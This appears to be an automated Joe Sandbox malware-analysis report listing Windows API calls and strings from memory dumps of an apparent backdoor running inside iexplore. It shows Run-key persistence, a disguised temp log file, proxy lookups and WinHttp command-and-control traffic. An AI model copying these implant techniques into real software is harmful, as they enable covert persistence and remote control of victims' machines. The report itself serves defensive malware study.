    • ??_U@YAPAXI@Z.MSVCRT ref: 00513572
    • memset.MSVCRT ref: 0051357C
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000), ref: 0051358D
      • Part of subcall function 0051A79D: _errno.MSVCRT ref: 0051A7B5
      • Part of subcall function 0051A79D: _errno.MSVCRT ref: 0051A7F0
    • ??_V@YAXPAX@Z.MSVCRT ref: 005135A2
    • ??_V@YAXPAX@Z.MSVCRT ref: 005135A8
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 00515FA9
    • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00515FC9
    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00515F8B), ref: 00515FE0
    • CloseHandle.KERNEL32(00515F8B), ref: 00515FEC
    • memcpy.MSVCRT ref: 0051603E
    • memcpy.MSVCRT ref: 00516052
      • Part of subcall function 0051476E: rand.MSVCRT ref: 0051479C
      • Part of subcall function 0051476E: ??2@YAPAXI@Z.MSVCRT ref: 005147B4
      • Part of subcall function 0051476E: ??3@YAXPAX@Z.MSVCRT ref: 0051481E
      • Part of subcall function 0051476E: ??3@YAXPAX@Z.MSVCRT ref: 00514862
    • ??3@YAXPAX@Z.MSVCRT ref: 00516087
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
    Strings
    • Send OP_DOWNLOAD_END Data Failed!, xrefs: 00516077
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,0000C6FF,000000FF,00000000,00000000,00000008,?,0000C6FF,?,?,?,005153ED,0000C6FF,00000000), ref: 0051346E
    • ??_U@YAPAXI@Z.MSVCRT ref: 00513484
    • MultiByteToWideChar.KERNEL32(00000000,00000000,0000C6FF,000000FF,00000000,00000001,?,?,?,005153ED,0000C6FF,00000000), ref: 005134A1
    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,005153ED,0000C6FF,00000000), ref: 005134B8
    • ??_U@YAPAXI@Z.MSVCRT ref: 005134BE
    • memset.MSVCRT ref: 005134C9
    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,0000C6FF,00000001,00000000,00000000,?,005153ED,0000C6FF,00000000), ref: 005134E2
      • Part of subcall function 0051A79D: _errno.MSVCRT ref: 0051A7B5
      • Part of subcall function 0051A79D: _errno.MSVCRT ref: 0051A7F0
    • ??_V@YAXPAX@Z.MSVCRT ref: 005134F5
    • ??_V@YAXPAX@Z.MSVCRT ref: 005134FD
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,0002001F,?,00000000,?,00000000), ref: 005160E2
    • memset.MSVCRT ref: 00516113
    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000), ref: 00516136
    • RegDeleteValueA.ADVAPI32(?,?,?,?,00000000), ref: 0051614A
    • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00516157
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 005160B8
    • IAStorD, xrefs: 005160F0
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.773005659.004F0000.00000040.sdmp, Offset: 004F0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4f0000_iexplore.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • _errno.MSVCRT ref: 004F3F4F
    • _errno.MSVCRT ref: 004F3FC6
      • Part of subcall function 004F3287: OutputDebugStringA.KERNEL32(Invalid parameter passed to C runtime function.), ref: 004F3275
    • wctomb.MSVCRT ref: 004F3F74
    • memset.MSVCRT ref: 004F3F8E
    • _errno.MSVCRT ref: 004F3F96
    • memset.MSVCRT ref: 004F3FBE
    • memcpy.MSVCRT ref: 004F3FDA
      • Part of subcall function 004F32A0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004F3CE2
      • Part of subcall function 004F32A0: UnhandledExceptionFilter.KERNEL32(004F6190), ref: 004F3CED
      • Part of subcall function 004F32A0: GetCurrentProcess.KERNEL32(C0000409), ref: 004F3CF8
      • Part of subcall function 004F32A0: TerminateProcess.KERNEL32(00000000), ref: 004F3CFF
    Memory Dump Source
    • Source File: 00000003.00000002.773005659.004F0000.00000040.sdmp, Offset: 004F0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4f0000_iexplore.jbxd
    APIs
    • _errno.MSVCRT ref: 0051B6F2
    • _errno.MSVCRT ref: 0051B769
      • Part of subcall function 0051A441: OutputDebugStringA.KERNEL32(Invalid parameter passed to C runtime function.), ref: 0051A42F
    • wctomb.MSVCRT ref: 0051B717
    • memset.MSVCRT ref: 0051B731
    • _errno.MSVCRT ref: 0051B739
    • memset.MSVCRT ref: 0051B761
    • memcpy.MSVCRT ref: 0051B77D
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • time.MSVCRT ref: 0051900D
    • srand.MSVCRT ref: 00519014
    • ??2@YAPAXI@Z.MSVCRT ref: 0051901C
    • rand.MSVCRT ref: 00519040
      • Part of subcall function 0051A476: _errno.MSVCRT ref: 0051A48F
      • Part of subcall function 0051A476: memcpy.MSVCRT ref: 0051A4BB
      • Part of subcall function 0051A476: memset.MSVCRT ref: 0051A4CC
      • Part of subcall function 0051A476: _errno.MSVCRT ref: 0051A4DE
    • ??3@YAXPAX@Z.MSVCRT ref: 005190BC
    Strings
    • 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz_, xrefs: 00518FF8, 00519049
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • memset.MSVCRT ref: 00515004
    • memset.MSVCRT ref: 00515062
    • strstr.MSVCRT ref: 005150A5
      • Part of subcall function 0051A805: _errno.MSVCRT ref: 0051A832
      • Part of subcall function 0051A805: _errno.MSVCRT ref: 0051A8AC
      • Part of subcall function 0051A79D: _errno.MSVCRT ref: 0051A7B5
      • Part of subcall function 0051A79D: _errno.MSVCRT ref: 0051A7F0
      • Part of subcall function 005149DD: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000004,00000000,00000000), ref: 00514A11
      • Part of subcall function 005149DD: memcpy.MSVCRT ref: 00514A35
      • Part of subcall function 005149DD: ??2@YAPAXI@Z.MSVCRT ref: 00514A3C
      • Part of subcall function 005149DD: ??3@YAXPAX@Z.MSVCRT ref: 00514A62
      • Part of subcall function 005149DD: WriteFile.KERNEL32(?,?,00000269,?,00000000), ref: 00514A7D
      • Part of subcall function 005149DD: CloseHandle.KERNEL32(?), ref: 00514A86
    • GetLastError.KERNEL32(00000000,?,00000000), ref: 00515220
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
      • Part of subcall function 00514D05: memset.MSVCRT ref: 00514D3A
      • Part of subcall function 00514D05: GetLastError.KERNEL32(00000001,?,00000000), ref: 00514D50
      • Part of subcall function 00514D05: memcpy.MSVCRT ref: 00514DBE
      • Part of subcall function 00514D05: memcpy.MSVCRT ref: 00514E2D
      • Part of subcall function 00514D05: memcpy.MSVCRT ref: 00514E87
      • Part of subcall function 00514D05: memcpy.MSVCRT ref: 00514ED7
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 004F1CAE
    • memset.MSVCRT ref: 004F1CBE
    • memcpy.MSVCRT ref: 004F1CDA
    • memcpy.MSVCRT ref: 004F1D0B
    • ??3@YAXPAX@Z.MSVCRT ref: 004F1D20
      • Part of subcall function 004F32A0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004F3CE2
      • Part of subcall function 004F32A0: UnhandledExceptionFilter.KERNEL32(004F6190), ref: 004F3CED
      • Part of subcall function 004F32A0: GetCurrentProcess.KERNEL32(C0000409), ref: 004F3CF8
      • Part of subcall function 004F32A0: TerminateProcess.KERNEL32(00000000), ref: 004F3CFF
    • ??2@YAPAXI@Z.MSVCRT ref: 004F1D3D
      • Part of subcall function 004F1B6D: __EH_prolog3_GS.LIBCMT ref: 004F1B77
      • Part of subcall function 004F1B6D: ??2@YAPAXI@Z.MSVCRT ref: 004F1BC6
      • Part of subcall function 004F1B6D: memset.MSVCRT ref: 004F1BD6
      • Part of subcall function 004F1B6D: ??2@YAPAXI@Z.MSVCRT ref: 004F1C4A
      • Part of subcall function 004F1B6D: memcpy.MSVCRT ref: 004F1C63
    Memory Dump Source
    • Source File: 00000003.00000002.773005659.004F0000.00000040.sdmp, Offset: 004F0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4f0000_iexplore.jbxd
    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 0051910D
    • memcpy.MSVCRT ref: 0051911A
    • memset.MSVCRT ref: 00519127
    • memset.MSVCRT ref: 00519141
    • memcpy.MSVCRT ref: 00519159
      • Part of subcall function 0051A2AF: memcpy.MSVCRT ref: 0051A2F6
      • Part of subcall function 0051A2AF: memcpy.MSVCRT ref: 0051A322
      • Part of subcall function 0051A2AF: memcpy.MSVCRT ref: 0051A377
    • ??3@YAXPAX@Z.MSVCRT ref: 005191AD
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
    • WinHttpOpen.WINHTTP(00000000,00000003,?,00000000,00000000,?,00000000,?,00513F1F,00000000,?), ref: 005120EC
      • Part of subcall function 005121E5: memset.MSVCRT ref: 00512208
      • Part of subcall function 005121E5: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000020,?,00000020,?,?,00000000), ref: 0051221B
      • Part of subcall function 005121E5: wcsstr.MSVCRT ref: 0051222A
      • Part of subcall function 005121E5: _wtoi.MSVCRT ref: 0051223B
      • Part of subcall function 005121E5: WinHttpConnect.WINHTTP(?,?,00000050,00000000,?,?,00000000), ref: 00512277
      • Part of subcall function 005121E5: GetLastError.KERNEL32(?,?,00000000), ref: 00512284
      • Part of subcall function 0051129D: memset.MSVCRT ref: 00511301
      • Part of subcall function 0051129D: RegQueryValueExW.ADVAPI32(00000000,ProxyEnable,00000000,00000000,?,?,?,?,00000000), ref: 00511345
      • Part of subcall function 0051129D: RegQueryValueExW.ADVAPI32(?,ProxyServer,00000000,00000000,?,?), ref: 00511370
      • Part of subcall function 0051129D: RegCloseKey.ADVAPI32(?), ref: 00511378
      • Part of subcall function 0051129D: ___swprintf_l.LIBCMT ref: 00511398
      • Part of subcall function 0051129D: wcsstr.MSVCRT ref: 005113B9
      • Part of subcall function 0051129D: wcsstr.MSVCRT ref: 005113D3
      • Part of subcall function 0051129D: wcsstr.MSVCRT ref: 005113EE
      • Part of subcall function 0051129D: memset.MSVCRT ref: 00511412
      • Part of subcall function 0051129D: ___swprintf_l.LIBCMT ref: 005114C2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
      • Part of subcall function 00511124: memset.MSVCRT ref: 0051115A
      • Part of subcall function 00511124: RegEnumKeyW.ADVAPI32(80000003,00000000,?,00000104), ref: 0051117D
      • Part of subcall function 00511124: wcsncmp.MSVCRT(S-1-5-21,?,00000008), ref: 00511199
      • Part of subcall function 00511124: wcsstr.MSVCRT ref: 005111B1
      • Part of subcall function 00511124: memset.MSVCRT ref: 005111CF
      • Part of subcall function 00511124: RegOpenKeyExW.ADVAPI32(80000003,?,00000000,00020019,?), ref: 00511206
    • RegQueryValueExW.ADVAPI32(00000000,AutoConfigURL,00000000,00000000,00000400,00000400,?,00000000), ref: 00511257
    • RegCloseKey.ADVAPI32(00000000), ref: 00511260
      • Part of subcall function 00518133: memset.MSVCRT ref: 00518179
      • Part of subcall function 00518133: GetLocalTime.KERNEL32(?,?,?,?), ref: 00518188
      • Part of subcall function 00518133: ___swprintf_l.LIBCMT ref: 005181D0
      • Part of subcall function 00518133: memset.MSVCRT ref: 0051821C
      • Part of subcall function 00518133: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000C800,00000000,00000000), ref: 00518239
      • Part of subcall function 00518133: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 0051825C
      • Part of subcall function 00518133: GetFileSize.KERNEL32(00000000,00000000), ref: 0051826B
      • Part of subcall function 00518133: SetEndOfFile.KERNEL32(00000000), ref: 00518280
      • Part of subcall function 00518133: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0051828D
      • Part of subcall function 00518133: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 005182CB
      • Part of subcall function 00518133: CloseHandle.KERNEL32(00000000), ref: 005182D2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 00519203
    • memset.MSVCRT ref: 00519224
    • memcpy.MSVCRT ref: 0051923B
      • Part of subcall function 00519829: memset.MSVCRT ref: 0051994C
      • Part of subcall function 0051A2AF: memcpy.MSVCRT ref: 0051A2F6
      • Part of subcall function 0051A2AF: memcpy.MSVCRT ref: 0051A322
      • Part of subcall function 0051A2AF: memcpy.MSVCRT ref: 0051A377
    • memcpy.MSVCRT ref: 00519297
    • ??3@YAXPAX@Z.MSVCRT ref: 005192B2
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • _itoa.MSVCRT ref: 0051B645
    • _snprintf.MSVCRT ref: 0051B683
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 004F5A19
    • GetCurrentProcessId.KERNEL32 ref: 004F5A25
    • GetCurrentThreadId.KERNEL32 ref: 004F5A2D
    • GetTickCount.KERNEL32 ref: 004F5A35
    • QueryPerformanceCounter.KERNEL32(?), ref: 004F5A41
    Memory Dump Source
    • Source File: 00000003.00000002.773005659.004F0000.00000040.sdmp, Offset: 004F0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4f0000_iexplore.jbxd
    APIs
    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0051D1B9
    • GetCurrentProcessId.KERNEL32 ref: 0051D1C5
    • GetCurrentThreadId.KERNEL32 ref: 0051D1CD
    • GetTickCount.KERNEL32 ref: 0051D1D5
    • QueryPerformanceCounter.KERNEL32(?), ref: 0051D1E1
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • WinHttpCloseHandle.WINHTTP(?,?,00000000,00513407), ref: 0051341B
    • WinHttpCloseHandle.WINHTTP(?,?,00000000,00513407), ref: 00513425
    • WinHttpCloseHandle.WINHTTP(?,?,00000000,00513407), ref: 0051342F
    • WinHttpCloseHandle.WINHTTP(?,?,00000000,00513407), ref: 00513439
    • WinHttpCloseHandle.WINHTTP(?,?,00000000,00513407), ref: 00513442
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • DeleteFileA.KERNEL32(?,00520170,0000002C,005143F8,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,000003EB,?,00000000), ref: 005161AD
    • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 005161C0
      • Part of subcall function 0051476E: rand.MSVCRT ref: 0051479C
      • Part of subcall function 0051476E: ??2@YAPAXI@Z.MSVCRT ref: 005147B4
      • Part of subcall function 0051476E: ??3@YAXPAX@Z.MSVCRT ref: 0051481E
      • Part of subcall function 0051476E: ??3@YAXPAX@Z.MSVCRT ref: 00514862
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
      • Part of subcall function 00516097: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,0002001F,?,00000000,?,00000000), ref: 005160E2
      • Part of subcall function 00516097: memset.MSVCRT ref: 00516113
      • Part of subcall function 00516097: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000), ref: 00516136
      • Part of subcall function 00516097: RegDeleteValueA.ADVAPI32(?,?,?,?,00000000), ref: 0051614A
      • Part of subcall function 00516097: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00516157
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
      • Part of subcall function 0051129D: memset.MSVCRT ref: 00511301
      • Part of subcall function 0051129D: RegQueryValueExW.ADVAPI32(00000000,ProxyEnable,00000000,00000000,?,?,?,?,00000000), ref: 00511345
      • Part of subcall function 0051129D: RegQueryValueExW.ADVAPI32(?,ProxyServer,00000000,00000000,?,?), ref: 00511370
      • Part of subcall function 0051129D: RegCloseKey.ADVAPI32(?), ref: 00511378
      • Part of subcall function 0051129D: ___swprintf_l.LIBCMT ref: 00511398
      • Part of subcall function 0051129D: wcsstr.MSVCRT ref: 005113B9
      • Part of subcall function 0051129D: wcsstr.MSVCRT ref: 005113D3
      • Part of subcall function 0051129D: wcsstr.MSVCRT ref: 005113EE
      • Part of subcall function 0051129D: memset.MSVCRT ref: 00511412
      • Part of subcall function 0051129D: ___swprintf_l.LIBCMT ref: 005114C2
    • WinHttpOpen.WINHTTP(00000000,00000003,?,00000000,00000000,?,HTTPS,?,?,?,00513D67,00000000,?,00000000,00000001,00000001), ref: 00512062
      • Part of subcall function 005121E5: memset.MSVCRT ref: 00512208
      • Part of subcall function 005121E5: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000020,?,00000020,?,?,00000000), ref: 0051221B
      • Part of subcall function 005121E5: wcsstr.MSVCRT ref: 0051222A
      • Part of subcall function 005121E5: _wtoi.MSVCRT ref: 0051223B
      • Part of subcall function 005121E5: WinHttpConnect.WINHTTP(?,?,00000050,00000000,?,?,00000000), ref: 00512277
      • Part of subcall function 005121E5: GetLastError.KERNEL32(?,?,00000000), ref: 00512284
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • WinHttpReadData.WINHTTP(?,?,?,?,?,?,?,0051410A,?,00000000,00000004), ref: 0051338C
    • GetLastError.KERNEL32(?,?,0051410A,?,00000000,00000004), ref: 005133A6
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • _errno.MSVCRT ref: 0051A48F
      • Part of subcall function 0051A441: OutputDebugStringA.KERNEL32(Invalid parameter passed to C runtime function.), ref: 0051A42F
    • memcpy.MSVCRT ref: 0051A4BB
    • memset.MSVCRT ref: 0051A4CC
    • _errno.MSVCRT ref: 0051A4DE
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    APIs
    • memset.MSVCRT ref: 00515C4B
    • memcpy.MSVCRT ref: 00515C72
      • Part of subcall function 0051476E: rand.MSVCRT ref: 0051479C
      • Part of subcall function 0051476E: ??2@YAPAXI@Z.MSVCRT ref: 005147B4
      • Part of subcall function 0051476E: ??3@YAXPAX@Z.MSVCRT ref: 0051481E
      • Part of subcall function 0051476E: ??3@YAXPAX@Z.MSVCRT ref: 00514862
    • GetLastError.KERNEL32(00000000,?,000003F2,?), ref: 00515CC0
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
